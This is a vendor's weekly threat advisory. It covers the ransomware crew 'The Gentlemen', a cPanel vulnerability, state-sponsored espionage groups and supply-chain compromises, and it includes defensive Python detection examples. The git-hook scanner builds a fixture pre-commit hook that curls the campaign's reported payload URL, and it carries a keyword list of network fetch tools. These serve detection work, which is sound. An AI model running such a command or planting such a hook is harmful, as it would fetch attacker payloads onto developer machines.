3 Things Security Leaders Should Care About This Week
1. A new ransomware crew is now fully operational, and the full intrusion chain has been documented. “The Gentlemen” runs an end-to-end campaign anchored in edge appliance exploitation and Microsoft 365 credential theft, with a confirmed $190,000 ransom already paid. Every stage of the chain abuses legitimate enterprise tooling. If your SOC playbooks only fire at the encryption stage, the operator has already been resident through four prior stages.
2. A critical cPanel and WHM vulnerability is being scanned globally, with exploitation expected within the fortnight. CVE-2026-41940 (CVSS 9.8) lets unauthenticated attackers take administrative control of cPanel-based hosting. Mass scanning is happening now. If your customer-facing services, marketing sites, or hosted infrastructure run on cPanel, this is the patch decision of the week.
3. State-sponsored activity is at its highest density of the quarter. Five distinct nation-state attributions surfaced in seven days — Iran, Belarus, China-nexus (×2), and North Korea — with multiple campaigns engineered specifically to defeat sandbox-based analysis. Detection workflows that depend on sandbox verdicts to elevate static indicators are arriving at confirmed APT compromises weeks late.
Where the Week’s Activity Concentrates
This week’s threat landscape produced 567 indicators across 35 new adversaries — a deliberately deduplicated snapshot of activity that did not appear in last week’s reporting. The operationally important signal clusters into three patterns:
- 🔴 ACT THIS WEEK — The Gentlemen full intrusion chain is now public. Operator-side intelligence leak plus defender-side incident-response forensics give us EtherRAT → TukTuk C2 → commercial RMM hands-on-keyboard → ransomware. Sequence-aware detection across the chain is the only response that catches it before the impact stage.
- 🔴 ACT THIS WEEK — CVE-2026-41940 mass scanning is live. 51 scanner indicators are enumerating exposed cPanel and WHM installations. Patching window is measured in days.
- Five state-sponsored attributions in seven days: Seedworm (Iran), FrostyNeighbor (Belarus), FamousSparrow and TencShell (China-nexus), Lazarus (DPRK). FrostyNeighbor’s server-side validation tradecraft specifically defeats sandbox pipelines and demands a sandbox-independent IOC handling policy.
Below is the adversary breakdown with our threat advisory lens applied: what each threat looks like in customer telemetry, where reactive SOC workflows typically lose time, and what AiStrike automates so your team isn’t the one losing it.
The underlying threat intelligence in this brief is produced in partnership with HACKFORLAB’s research team. The threat advisory analysis, coverage priorities, and platform context are AiStrike’s own.
This Week in Numbers
- 567 IOCs indexed across 4 indicator types — Hashes lead at 294, Domains at 160, URLs at 75, IPs at 38.
- 35 distinct adversaries active this week, all new — none appeared in last week’s reporting.
- Severity skew is sharp: 498 IOCs (88%) carry a High severity rating; 65 are Low (predominantly CVE-2026-41940 scanner reconnaissance); 4 are Medium.
- By category: Malware leads at 310 IOCs · Malware campaigns at 102 · Threat actors at 53 · Scanner activity at 51 · Ransomware at 33 · Phishing at 14 · C2 at 4.
- State-sponsored fingerprint: Four clusters — FrostyNeighbor, Seedworm, Lazarus, FamousSparrow — score at confidence 97 on robust external attribution. The single densest week of state-actor activity this quarter.
🔴 Featured Adversary: The Gentlemen — Ransomware-as-a-Service
33 IOCs · High Severity · Confidence 90 · ACT THIS WEEK
A professionalised RaaS crew whose operator-side “Rocket” backend database was leaked, exposing nine internal accounts including the lead operator (handle zeta88). Confirmed ransom of $190,000 USD against an opening anchor of $250,000. Initial access spans Fortinet and Cisco edge appliance exploitation, NTLM relay, and Microsoft 365 credential harvesting. The full intrusion chain — corroborated by incident-response forensics — runs EtherRAT implant → TukTuk C2 over SaaS and blockchain → commercial RMM hands-on-keyboard → ransomware encryption. MITRE TTPs: T1190, T1187, T1078, T1098, T1486, T1657, T1659.
Where reactive workflows fall short. Every stage of this chain abuses legitimate enterprise tooling — edge appliances treated as managed infrastructure with limited telemetry, SaaS-routed C2 on the allow-list, commercial RMM that looks identical to legitimate IT activity. By the time ransomware fires the alert, the operator has been resident through the full kill chain. Traditional playbooks engineered for impact-stage response arrive at the end of the story.
The AiStrike threat advisory lens. The Gentlemen is fundamentally a sequence problem. AiStrike correlates the chain — edge appliance auth anomalies, then unsigned MSI execution, then outbound to fresh SaaS endpoints, then commercial RMM activity from an identity that doesn’t normally invoke it — and elevates the sequence before encryption begins. The 33 ransomware IOCs and 35 EtherRAT IOCs are useful inputs, but customer protection is anchored in behavioral chain detection, not the indicator list. The operational question this week isn’t “do we have the IOCs”; it’s “have we baselined per-identity RMM behavior so the chain registers as a deviation.”
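As an added illustration of the sequence-aware correlation described above (example code written for this brief, not AiStrike's platform logic): it walks constructed telemetry keyed by identity and reports how many of the four pre-encryption stages have fired in order within an assumed 72-hour window, so a two-stage partial chain is already visible. Signal names, identities, hosts and the window are constructed assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Pre-encryption stages of The Gentlemen chain, in the order the advisory gives them.
# Signal names are constructed labels for this example, not a vendor's schema.
CHAIN = [
    "edge_auth_anomaly",      # edge appliance authentication anomaly
    "unsigned_msi_exec",      # EtherRAT implant installed via unsigned MSI
    "outbound_fresh_saas",    # TukTuk C2 over a newly seen SaaS endpoint
    "rmm_unusual_identity",   # commercial RMM invoked by an identity that never does
]
WINDOW = timedelta(hours=72)  # assumed dwell window for correlating stages


@dataclass(frozen=True)
class Event:
    ts: datetime
    identity: str   # correlation key: the account seen at each stage
    host: str
    signal: str


def chain_progress(events, min_stages=2):
    """Return {identity: (stages_matched, first_ts, last_ts)} for identities whose
    events hit the chain stages in order within WINDOW of the first stage.
    Out-of-order signals (RMM before MSI) or stale ones outside the window
    do not count, which is what separates this from a flat indicator match."""
    by_identity = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_identity.setdefault(ev.identity, []).append(ev)
    hits = {}
    for identity, evs in by_identity.items():
        best = (0, None, None)
        for i, start in enumerate(evs):
            if start.signal != CHAIN[0]:
                continue
            stage, last = 0, start.ts
            for ev in evs[i:]:
                if ev.ts - start.ts > WINDOW:
                    break
                if stage < len(CHAIN) and ev.signal == CHAIN[stage]:
                    stage, last = stage + 1, ev.ts
            if stage > best[0]:
                best = (stage, start.ts, last)
        if best[0] >= min_stages:
            hits[identity] = best
    return hits


def _t(day, hour):
    return datetime(2026, 5, day, hour)


# Constructed telemetry for three identities (sample data, not real incident data).
SAMPLE = [
    # jdoe: complete four-stage chain inside the window
    Event(_t(11, 2), "corp\\jdoe", "vpn-edge-01", "edge_auth_anomaly"),
    Event(_t(11, 9), "corp\\jdoe", "ws-114", "unsigned_msi_exec"),
    Event(_t(11, 9), "corp\\jdoe", "ws-114", "outbound_fresh_saas"),
    Event(_t(12, 14), "corp\\jdoe", "ws-114", "rmm_unusual_identity"),
    # bwong: only the first two stages so far (still worth elevating)
    Event(_t(11, 3), "corp\\bwong", "vpn-edge-01", "edge_auth_anomaly"),
    Event(_t(11, 10), "corp\\bwong", "ws-207", "unsigned_msi_exec"),
    # asmith: stale edge anomaly ten days earlier, later stages out of order
    Event(_t(1, 8), "corp\\asmith", "vpn-edge-01", "edge_auth_anomaly"),
    Event(_t(11, 8), "corp\\asmith", "ws-310", "rmm_unusual_identity"),
    Event(_t(11, 11), "corp\\asmith", "ws-310", "unsigned_msi_exec"),
]

if __name__ == "__main__":
    for who, (stages, first, last) in chain_progress(SAMPLE).items():
        print(f"{who}: {stages}/{len(CHAIN)} stages between {first} and {last}")
```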
🔴 Featured Adversary: FrostyNeighbor — Belarus-Aligned Espionage
21 IOCs · High Severity · Confidence 97 · SANDBOX-INDEPENDENT
Belarus state-aligned threat actor with fresh activity (March 2026) against Ukrainian government targets. The distinguishing tradecraft is server-side victim validation: before delivering the final payload, FrostyNeighbor’s infrastructure validates the victim’s environment from the server side. Sandboxes and research VMs get a benign decoy. Real victims get the real payload. This single design choice defeats sandbox-based analysis pipelines almost categorically. MITRE TTPs: T1566.001, T1059.001, T1105, T1027, T1480, T1102.002, T1071.001.
Where reactive workflows fall short. Sandbox-centric workflows fail loudest here. An analyst submits the lure, the sandbox detonates the first stage, the server returns the benign decoy, the sandbox verdict comes back clean. The IOC pipeline marks the indicator low-priority. The actual victim — whose environment matched the server-side validation criteria — gets the real implant. Mean time to discovery on FrostyNeighbor intrusions, in sandbox-dependent environments, is measured in weeks.
The AiStrike threat advisory lens. Treat the static indicators as authoritative regardless of sandbox verdict. AiStrike ingests the 13 FrostyNeighbor file-hash artifacts as confidence-97 triggers — they fire on hash match alone, with investigation context auto-assembled around the match. The platform does not require sandbox corroboration to elevate, because the threat class is specifically engineered to produce a clean sandbox verdict. For confidence-97 state-actor clusters with documented server-side validation tradecraft, our default inverts the usual SOC logic: hash match elevates immediately, and the sandbox result becomes supporting evidence, not gating evidence.
Featured Adversary: Seedworm — Iran-Linked Q1 2026 Espionage
20 IOCs · High Severity · Confidence 97
MOIS-affiliated Iranian APT operating across nine organisations on four continents in Q1 2026, including a near-week-long intrusion at a South Korean electronics manufacturer. The tradecraft signature is DLL sideloading with legitimately signed binaries from Fortemedia and major enterprise endpoint-security vendors. Implant chain runs through node.exe with PowerShell modules for reconnaissance, screenshot capture, SAM hive theft, and SOCKS5 reverse-proxy tunnelling. MITRE TTPs: T1574.002, T1059.001, T1056.001, T1113, T1003.002, T1547.001, T1572, T1090.001.
Where reactive workflows fall short. Legitimately signed binaries don’t fire signature-trust controls. Sideloaded malicious DLLs inherit the signing context for most policy decisions. Each individual signal sits below most SOC alert thresholds. The intrusion only surfaces — if it surfaces — when the cumulative pattern crosses a threshold that traditional alerting was never designed to measure.
The AiStrike threat advisory lens. The signal is the combination: signed-binary sideload pattern, plus PowerShell module execution from a node.exe parent, plus a SOCKS5 listener on an unexpected port, plus SAM hive access from an identity that doesn’t normally touch credential storage. AiStrike treats these as a single investigation thread, not as four separate medium-severity findings stacked in a queue. For confidence-97 state-actor clusters, the platform elevates within minutes of the cumulative pattern reaching threshold — typically while only the first two or three signals have fired, well before SAM hive theft completes.
Featured Adversary: Lazarus — DPRK “Contagious Interview” via Git Hooks
5 IOCs · High Severity · Confidence 97
The DPRK “Contagious Interview” campaign continues, with a novel execution technique. Developers approached through fake job interviews clone a GitHub repository as a “coding test.” Hidden inside: a malicious .git/hooks/pre-commit script that executes on first commit, abusing the trust the developer has already extended to the cloned repository. Infrastructure includes precommit.vercel.app/settings/{mac|linux|windows}?flag=5 — multi-platform from the first request. MITRE TTPs: T1566.003, T1195.001, T1546.004, T1059.004, T1567.
Where reactive workflows fall short. Developer endpoints are typically the least-controlled population in any enterprise. Code editors, terminals, and Git operations involve constant execution of external code, and most EDR policies are explicitly tuned to not alert on this activity. A pre-commit hook firing on first commit looks identical to a thousand legitimate developer-tooling actions per day. By the time downstream indicators surface, the developer’s credentials, signing keys, and source-code access are already in DPRK hands.
The AiStrike threat advisory lens. IOC-based coverage works here, because the hosted infrastructure is unusual enough to alert on with high precision — AiStrike fires on the precommit.vercel.app/settings/* URL pattern directly. But the more durable layer is behavioral: outbound to a fresh Vercel subdomain from a developer endpoint within minutes of a git clone, plus multi-platform payload requests in sequence. IOCs rotate in weeks; the developer-workflow behavioral pattern does not. Both layers ship.
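One way to give developer endpoints the hook visibility this section calls for, as an added example rather than AiStrike's detection or the campaign's tooling: it enumerates the live (non-.sample) hooks in a clone, honouring core.hooksPath, and flags any hook that reaches out to the network, treating the advisory's precommit.vercel.app/settings/ pattern as a known indicator. The fixture repository, fetcher keyword list and hook contents are constructed.

```python
import os
import re
import tempfile
from pathlib import Path

# Git ships hook templates ending in ".sample"; anything else under .git/hooks
# (or a configured core.hooksPath) is live and runs on the next matching git action.
URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCHERS = ("curl", "wget", "Invoke-WebRequest", "fetch(")  # assumed keyword list
# URL pattern quoted in the advisory for the Lazarus campaign.
KNOWN_BAD = re.compile(r"precommit\.vercel\.app/settings/")


def hooks_dir(repo: Path) -> Path:
    """Honour core.hooksPath from .git/config (simple key scan, section ignored),
    falling back to the default .git/hooks."""
    cfg = repo / ".git" / "config"
    if cfg.exists():
        for line in cfg.read_text().splitlines():
            key, _, value = line.strip().partition("=")
            if key.strip() == "hooksPath":
                path = Path(value.strip())
                return path if path.is_absolute() else repo / path
    return repo / ".git" / "hooks"


def scan_repo(repo: Path):
    """Return one finding per live hook that contains a URL or a fetch command."""
    findings = []
    d = hooks_dir(repo)
    if not d.is_dir():
        return findings
    for hook in sorted(d.iterdir()):
        if hook.suffix == ".sample" or not hook.is_file():
            continue
        body = hook.read_text(errors="replace")
        urls = URL_RE.findall(body)
        if urls or any(f in body for f in FETCHERS):
            findings.append({
                "hook": hook.name,
                "urls": urls,
                "known_ioc": any(KNOWN_BAD.search(u) for u in urls),
                "executable": os.access(hook, os.X_OK),
            })
    return findings


def build_fixture() -> Path:
    """Constructed repo layout (no git binary needed): one live pre-commit hook that
    calls out to the network, one harmless local hook, and a stock .sample file."""
    repo = Path(tempfile.mkdtemp(prefix="hookscan-"))
    hooks = repo / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (repo / ".git" / "config").write_text("[core]\n\trepositoryformatversion = 0\n")
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")
    (hooks / "pre-push").write_text("#!/bin/sh\nmake lint\n")  # benign local hook
    bad = hooks / "pre-commit"
    # Constructed hook body using the URL pattern the advisory reports (test data only).
    bad.write_text("#!/bin/sh\ncurl -s https://precommit.vercel.app/settings/linux?flag=5\n")
    bad.chmod(0o755)
    return repo


if __name__ == "__main__":
    for finding in scan_repo(build_fixture()):
        print(finding)
```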
Featured Adversary: Coruna — iOS Exploitation via Cryptocurrency Lures
99 IOCs · High Severity · Confidence 85
Palo Alto Unit 42-documented campaign delivering Coruna and DarkSword exploits to iOS users via fake cryptocurrency-reward pages. 93 of 99 indicators are domain infrastructure — heavily domain-driven. The lure consistently targets crypto wallet holders with “claim your reward” social engineering. MITRE TTPs: T1566.002, T1204.001, T1583.008, T1190, T1071.001.
Where reactive workflows fall short. Mobile threats sit in the blind spot of most enterprise SOC tooling. MDM platforms see device posture but not browser-level lure traffic. Network DNS resolvers see lookalike domain resolution but aren’t typically correlated against active mobile campaign intelligence. The result: 99 high-confidence indicators sit in a feed somewhere, and the first the SOC hears about a hit is when an employee reports a wallet drain — at which point the indicators are weeks old and the campaign infrastructure has rotated.
The AiStrike threat advisory lens. This is one of the rare attack classes where IOC-based detection works well — provided the IOCs reach the right enforcement points within hours, not days. AiStrike pushes Coruna domain infrastructure into enterprise mobile-management blocklists and corporate DNS recursive resolvers as a single coordinated update, mapped against the active campaign profile rather than as a flat IOC list. The timing is what we automate.
Featured Adversary: TencShell — Suspected China-Linked Custom Implant
55 IOCs · High Severity · Confidence 85
Cato CTRL-disclosed Go-based implant derived from the open-source Rshell C2 framework, identified in a global manufacturer’s network. Intrusion chain uses a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2. Attribution to a Chinese state-linked operator is assessed at moderate confidence. MITRE TTPs: T1105, T1055, T1620, T1036.008, T1071.001, T1027.
Where reactive workflows fall short. A .woff file masquerading as a web-font asset is exactly what perimeter and EDR tooling are trained not to alert on. The only signal is behavioral — the surrounding process spawning the load, the in-memory execution that follows, the outbound C2 that doesn’t quite look like normal web traffic. IOC-centric workflows are structurally late because the entry point doesn’t look like one.
The AiStrike threat advisory lens. AiStrike anchors detection on the behavior, not the masquerade: in-memory execution from an unsigned process region (T1620), web-traffic C2 patterns that deviate from the parent application’s normal outbound profile, parent-child relationships that don’t match the baselined behavior. The 51 file hashes in this week’s feed are useful breadcrumbs, but TencShell hashes rotate. The behavioral signature of reflective code loading from a font-file resource survives the rotation.
Featured Adversary: Hologram — Modular Implant with Hookdeck C2
47 IOCs · High Severity · Confidence 85
Six-binary modular implant framework delivered as a fake OpenClaw installer. The operationally distinctive element is the C2 transport chain: Hologram routes command-and-control through Azure DevOps, Telegram, and Hookdeck — three legitimate services inside virtually every enterprise allow-list. First documented use of clroxide in crimeware. Multiple infection waves have rotated infrastructure during disclosure. MITRE TTPs: T1204.002, T1036.005, T1102, T1027, T1055, T1105, T1071.001.
Where reactive workflows fall short. Hookdeck, Azure DevOps, and Telegram are services legitimate engineering and DevOps teams use daily. Blocking them isn’t an option; allow-listing them isn’t sufficient. The only meaningful detection signal is what the identity is doing on those services — and most SOC tooling doesn’t maintain per-identity, per-API baselines for legitimate SaaS platforms. The campaign is engineered around the gap between “this service is permitted” and “this identity should be using this service this way.”
The AiStrike threat advisory lens. AiStrike baselines identity behavior across legitimate SaaS surfaces continuously, and elevates sessions where API call patterns deviate from the identity’s role — even when every individual call is to a permitted service. For Hologram specifically, the signature isn’t “calls to Hookdeck”; it’s “calls to Hookdeck from an identity that has never used Hookdeck before, immediately following execution of a masqueraded MSI installer.”
Continuity from last week: This is the same detection chassis AiStrike applies to UAT-8302’s cloud-API C2 (Microsoft Graph, Yandex Cloud, GitHub) covered in the May 4–10 advisory. The pattern — APT C2 routed through legitimately allow-listed SaaS — is now the dominant tradecraft signature across two consecutive weeks. Per-identity, per-API baselining is no longer a forward-looking capability; it’s the current minimum.
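The per-identity, per-API baseline logic described in the Hologram section, as an added example (not AiStrike's implementation): it builds a 30-day baseline of which SaaS services each identity has used, then scores calls to the three Hologram transports by whether they are a first use for that identity and whether they follow a masqueraded-installer execution by the same identity within 30 minutes. The telemetry schema, identities, windows and the `masqueraded` sensor tag are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

BASELINE_DAYS = 30                      # assumed baseline period
TRIGGER_WINDOW = timedelta(minutes=30)  # assumed installer-to-first-call window
# The three legitimate services the advisory names as Hologram's C2 transports.
WATCHED = {"hookdeck.com", "dev.azure.com", "api.telegram.org"}


def build_baseline(events, now):
    """identity -> set of SaaS services used in the BASELINE_DAYS before `now`."""
    cutoff = now - timedelta(days=BASELINE_DAYS)
    seen = defaultdict(set)
    for ev in events:
        if ev["kind"] == "saas" and cutoff <= ev["ts"] < now:
            seen[ev["identity"]].add(ev["service"])
    return seen


def detect(events, baseline, now):
    """Score calls to WATCHED services made at or after `now`:
    +2 if the identity has never used that service in its baseline,
    +1 if the call follows a masqueraded-installer execution by the same identity
    within TRIGGER_WINDOW. Score 3 is the Hologram signature; 1 or 2 alone is
    returned with its lower score so an analyst sees why it is weaker."""
    recent = [e for e in events if e["ts"] >= now]
    installers = [e for e in recent if e["kind"] == "proc" and e.get("masqueraded")]
    alerts = []
    for ev in recent:
        if ev["kind"] != "saas" or ev["service"] not in WATCHED:
            continue
        first_use = ev["service"] not in baseline.get(ev["identity"], set())
        trigger = any(i["identity"] == ev["identity"]
                      and timedelta(0) <= ev["ts"] - i["ts"] <= TRIGGER_WINDOW
                      for i in installers)
        score = (2 if first_use else 0) + (1 if trigger else 0)
        if score:
            alerts.append({"identity": ev["identity"], "service": ev["service"],
                           "first_use": first_use, "after_installer": trigger,
                           "score": score})
    return alerts


NOW = datetime(2026, 5, 12, 9, 0)


def _d(days_ago, minutes=0):
    return NOW - timedelta(days=days_ago) + timedelta(minutes=minutes)


# Constructed telemetry: a DevOps service identity with a rich baseline and a
# finance user who runs a masqueraded installer and then touches new services.
# "masqueraded" is an assumed endpoint-sensor tag (e.g. product name vs signer mismatch).
SAMPLE = [
    *[{"kind": "saas", "identity": "svc-devops", "service": "dev.azure.com", "ts": _d(n)}
      for n in range(1, 30)],
    {"kind": "saas", "identity": "svc-devops", "service": "hookdeck.com", "ts": _d(5)},
    {"kind": "saas", "identity": "fin-user", "service": "dev.azure.com", "ts": _d(12)},
    {"kind": "proc", "identity": "fin-user", "name": "OpenClaw-Setup.msi",
     "masqueraded": True, "ts": _d(0, 1)},
    {"kind": "saas", "identity": "fin-user", "service": "hookdeck.com", "ts": _d(0, 4)},
    {"kind": "saas", "identity": "fin-user", "service": "api.telegram.org", "ts": _d(0, 6)},
    {"kind": "saas", "identity": "fin-user", "service": "dev.azure.com", "ts": _d(0, 8)},
    {"kind": "saas", "identity": "svc-devops", "service": "hookdeck.com", "ts": _d(0, 10)},
    {"kind": "saas", "identity": "svc-devops", "service": "api.telegram.org", "ts": _d(0, 12)},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE, build_baseline(SAMPLE, NOW), NOW):
        print(alert)
```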
Featured Adversary: Kong RAT — SEO-Poisoning Remote Access Trojan
41 IOCs · High Severity · Confidence 85
Long-running campaign (active May 2025 through March 2026) poisoning search results for FinalShell, Xshell, QuickQ VPN, Clash, and LeTV-related VPN tools, targeted at Chinese-speaking technical users. Sustained, precise targeting against developers and IT administrators. MITRE TTPs: T1608.006, T1189, T1204.002, T1036.005, T1105, T1071.001, T1567.
Where reactive workflows fall short. SEO poisoning operates upstream of every enterprise security control. The first telemetry an enterprise sees is the trojanised installer executing on a developer endpoint — at which point the question is no longer prevention but containment, and the malicious software has already been installed by the user with their full consent.
The AiStrike threat advisory lens. AiStrike treats SEO-poisoning as a behavioral signature, not an indicator chase. The 9 Kong RAT domains push to corporate DNS resolvers and MDM policy enforcement, but the durable detection layer is behavioral: a developer endpoint downloading an installer from a domain registered within the last 90 days, with the binary writing to non-standard paths and spawning outbound to fresh infrastructure. Long-running campaigns like Kong RAT don’t require continuous IOC refresh to maintain coverage.
Supply-Chain Pressure: Four Independent Disclosures in One Week
Four supply-chain compromises landed in this week’s window. The cumulative pattern is operationally more significant than any single campaign and warrants its own advisory lens.
- Open-OSS/privacy-filter (Hugging Face): Typosquatted OpenAI’s Privacy Filter, copied the model card verbatim, reached 200,000 downloads. Shipped a loader.py that fetched infostealer malware on Windows.
- JDownloader CMS compromise: Attackers exploited an unpatched CMS vulnerability to redirect download links to malicious files containing a Python RAT. Window: 6–7 May 2026.
- TeamPCP / Checkmarx Jenkins plugin: Same actor responsible for the Checkmarx GitHub Actions and OpenVSX compromises earlier this year, now with a backdoored Checkmarx Jenkins plugin.
- CNCF Antrea malicious PR: Threat actor opened a malicious pull request engineering CI poisoning to exfiltrate credentials. Rejected before merge — but the attempt itself signals an active campaign against CNCF projects.
Where reactive workflows fall short. Supply-chain compromise is where IOC-based detection fails most completely. The malicious code arrives signed (or signed-adjacent), from a trusted source, through sanctioned channels. No perimeter alert fires. Multi-ecosystem attacks in the same week compound the problem: most SOC tooling baselines one ecosystem at a time.
The AiStrike threat advisory lens. Per-application, per-identity behavioral baselining is the only approach that materially compresses the dwell window. For each of the four campaigns above, the signature isn’t the hashes (those rotate) or the source repository (those vary) — it’s the cross-ecosystem behavior of newly-installed packages: outbound to fresh infrastructure within minutes of install, child process spawns that don’t match the package’s stated purpose, credential-access patterns that deviate from baseline. AiStrike maintains those baselines continuously and surfaces deviation patterns mapped to known supply-chain TTPs.
MITRE ATT&CK Coverage Validation — This Week’s Priorities
The adversaries above concentrate around a tightly recurring set of ATT&CK techniques. If you only validate a limited subset this week, prioritize coverage for the following:
Coverage validation steps for the week:
- Run an ATT&CK heat-map self-assessment against the table above. For each Critical or High technique, identify whether you have at least one alerting detection in your environment and at least one hunting query.
- For the EtherRAT → TukTuk → The Gentlemen chain — validate that your detection can fire on the sequence, not just on individual techniques. The chain is the signal.
- For T1195.001 + T1546.004 together — the Lazarus Git-hooks chain — confirm you have telemetry coverage on developer endpoints, including .git/hooks/* execution. Most enterprise EDR baselines do not.
- For T1480 (FrostyNeighbor) — confirm your detection logic for high-confidence state-actor IOCs does not require sandbox corroboration.
- For T1219 (RMM abuse) — confirm per-identity baselining for ScreenConnect, Atera, commercial RMM, and remote-monitoring tools. “Is this tool allowed” is the wrong question; “is this identity supposed to be invoking this tool” is the right one.
SOC Priorities This Week
The seven priorities below convert this week’s adversary data into platform-automated outcomes — across detection, hunting, and alert and vulnerability prioritization. If your SOC is running these as manual hunts, every one of them is a place where time-to-decision can be measurably compressed.
- Sequence-aware detection for the EtherRAT → TukTuk → The Gentlemen chain. Impact-stage ransomware playbooks arrive at the end of the story. AiStrike correlates the full chain — edge appliance auth anomalies through MSI execution through SaaS-routed C2 through commercial RMM activity — and elevates the sequence before encryption begins.
- Sandbox-independent IOC handling for server-side-validated APTs. FrostyNeighbor’s design defeats sandbox-based analysis categorically. For confidence-97 state-actor clusters with documented server-side validation tradecraft, AiStrike treats hash matches as authoritative triggers and sandbox results as supporting evidence, not gating evidence. The 13 FrostyNeighbor hashes are live across customer environments today.
- Per-identity, per-API baselining for SaaS-routed C2. Hologram (Hookdeck, Azure DevOps, Telegram) is this week’s case; UAT-8302 was last week’s. The right question isn’t “is this service allowed” — it’s “is this identity supposed to be using this service this way.” AiStrike baselines this continuously across legitimate SaaS surfaces.
- Developer-endpoint Git-hooks coverage for Lazarus tradecraft. Most enterprise EDR baselines are tuned to not alert on Git operations. The Lazarus Git-hooks technique exploits exactly that calibration gap. AiStrike deploys detection for .git/hooks/* execution patterns correlated with outbound to fresh infrastructure within minutes of clone, and treats precommit.vercel.app/settings/* as a confidence-97 indicator.
- Cross-ecosystem supply-chain behavioral baselining. Four supply-chain compromises in one week — Hugging Face, JDownloader, Checkmarx Jenkins, CNCF Antrea — confirm this attack class is broadening across ecosystems faster than per-ecosystem detection can keep up. Per-application, per-identity behavioral baselines sustained across package managers, plugin marketplaces, and model repositories are one of the few approaches that materially shortens the dwell window.
- Signed-binary sideload detection for Seedworm-class tradecraft. AiStrike detects the sideload pattern (signed parent + unsigned DLL load + behavioral deviation) directly, without requiring the malicious DLL to be flagged by reputation systems.
- Real-time CVE-to-scanner correlation for CVE-2026-41940 and successors. Patching the perimeter isn’t a quarterly project; it’s a continuous reconciliation of “which devices are exposed, to which CVEs, being scanned by which active operator infrastructure this week.” For CVE-2026-41940, AiStrike cross-references the 51 scanner indicators against your inbound telemetry, so the patching queue reflects observed reconnaissance, not vulnerability inventory.
See This in Production at Gartner SRM 2026
If The Gentlemen full-chain detection, FrostyNeighbor sandbox-independent IOC handling, or cross-ecosystem supply-chain baselining are familiar problems in your environment, we’ll be walking through all three in production telemetry at Gartner Security & Risk Management Summit 2026 — Booth #453, June 1–3, National Harbor, MD.
Live demos focus on the operational moments this brief describes: the sequence-aware elevation that catches the Gentlemen chain before encryption, the static-IOC authoritative trigger logic for server-side-validated APTs, and the per-identity SaaS baselining that detects Hologram-class C2 routed through legitimate enterprise services.
Book a meeting at Gartner SRM 2026 →
The AiStrike Threat Advisory publishes weekly. Subscribe for next week’s coverage validation priorities, ATT&CK technique deep-dives, and platform-automated detection outcomes.
AiStrike delivers AI-native, preemptive cyber defense — turning reactive SOCs into proactive ones through agentic investigation, continuous detection optimization, and automated response. Customers see 50% lower SOC costs and 90% fewer false positives.
Threat intelligence partnership: HACKFORLAB. Threat advisory analysis: AiStrike Threat Operations.